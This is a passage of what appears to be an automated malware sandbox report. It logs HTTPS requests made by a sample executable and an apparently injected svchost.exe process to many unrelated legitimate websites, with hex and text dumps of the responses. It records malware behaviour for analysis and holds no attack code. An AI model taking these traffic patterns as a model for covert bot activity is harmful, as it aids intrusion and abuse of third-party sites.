                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5763INData Raw: 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76
                                                                                                                                                                                                                                                  Data Ascii: ages/rocketlauncher/home/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5764INData Raw: 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a
                                                                                                                                                                                                                                                  Data Ascii: pg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure>
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5766INData Raw: 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f
                                                                                                                                                                                                                                                  Data Ascii: /div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5767INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c
                                                                                                                                                                                                                                                  Data Ascii: div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div><
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5768INData Raw: 3c 2f 61 3e 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 43 6f 6e 73 75 6c 74 61 20 45 78 74 65 72 6e 61 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 33 2d 20 4f 70 63 69 c3 b3 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e
                                                                                                                                                                                                                                                  Data Ascii: </a></br><br></br><strong>Citas Consulta Externa: <p>6076430023- Opcin 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5770INData Raw: 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 20 67 2d 63 6f 6e 74 61 63 74 2d 63 6f 6d 70 61 63 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72
                                                                                                                                                                                                                                                  Data Ascii: <div class="g-contact g-contact-compact"><div class="g-contact-item"><div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5771INData Raw: 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 70 79 72 69 67 68 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f
                                                                                                                                                                                                                                                  Data Ascii: ction></div></div></div></section><section id="g-copyright"><div class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title="" rel="home" class="g-footer-lo
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5772INData Raw: 35 30 36 0d 0a 63 69 61 6c 2d 74 65 78 74 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e
                                                                                                                                                                                                                                                  Data Ascii: 506cial-text"></span></a></div></div></div></div></div></section></div><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5773INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  32192.168.2.421231185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5739OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: techtrans.de
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5739INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:33 GMT
                                                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                  Expires: 0
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                                                                                                  Connection: Upgrade, close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5739INData Raw: 32 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                  Data Ascii: 2c3<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  33192.168.2.42125391.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5740OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5774INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:56:24 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5774INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                  Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5790INData Raw: 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 0d 0a 32 30 30 30 0d 0a 65 6e 74 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20
                                                                                                                                                                                                                                                  Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... cont2000ent --><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ...
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5806INData Raw: 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 38 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 33 39 36 31 2c 64 6f 70 61 6c 61 63 0d 0a 31 30 30 30 0d 0a 7a 65 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 64 6f 70 61 6c 61 63 7a 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 31 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61
                                                                                                                                                                                                                                                  Data Ascii: aria-hidden="true" /></a></div><div class="item" style="width:300px; height:85px;margin-bottom:10px"><a href="/w20/batony/3961,dopalac1000ze.html" target="_blank" aria-label="dopalacze"><img src="/dokumenty/batony/3961.jpg?v=1657112618" a
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5822INData Raw: 63 6a 61 50 4c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 4f 64 77 69 65 64 c5 ba 20 6e 61 73 20 6e 61 20 59 6f 75 54 75 62 65 22 20 63 6c 61 73 73 3d 22 79 74 22 3e 4f 64 77 69 65 64 c5 ba 20 6e 61 73 20 6e 61 20 59 6f 75 54 75 62 65 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 57 69 65 6c 6b 6f 70 6f 6c 73 6b 61 2d 50 6f 0d 0a 37 34 32 0d 0a 6c 69 63 6a 61 2d 34 39 30 31 39 36 36 30 34 34 37 30 33 34 32 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 4f 64 77 69 65 64 c5 ba 20 6e 61 73 20 6e 61 20 46 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73
                                                                                                                                                                                                                                                  Data Ascii: cjaPL" target="_blank" title="Odwied nas na YouTube" class="yt">Odwied nas na YouTube</a></li> <li><a href="https://www.facebook.com/Wielkopolska-Po742licja-490196604470342/" target="_blank" title="Odwied nas na Facebook" clas


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  34192.168.2.421258188.114.96.7443C:\Users\user\Desktop\CX17SY6xF6.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5773OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: hyab.se
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5824INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:33 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Location: https://hyab.com
                                                                                                                                                                                                                                                  Cache-Control: max-age=600
                                                                                                                                                                                                                                                  Expires: Thu, 27 Jul 2023 20:04:33 GMT
                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2x3AeQ1sqL0yYKdIPMQKu4UJ0AxF1A8tc6Nti8ezkgdpkZlIDji8AGYftc2Q4lxSFNflK3cbUxqaBZeWp7qRflS0%2Fx5P%2FiPdowRJd%2FWvXG9pibM47ZXnJKTG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 7ed76f595c8c4d34-FRA
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5824INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5824INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  35192.168.2.42126394.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5824OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: diamir.de
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5825INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:33 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 162
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Location: https://www.diamir.de/
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                  2023-07-27 19:54:33 UTC5825INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  36192.168.2.421267172.67.193.133443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:34 UTC5825OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: hyab.com
                                                                                                                                                                                                                                                  2023-07-27 19:54:34 UTC5826INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:34 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
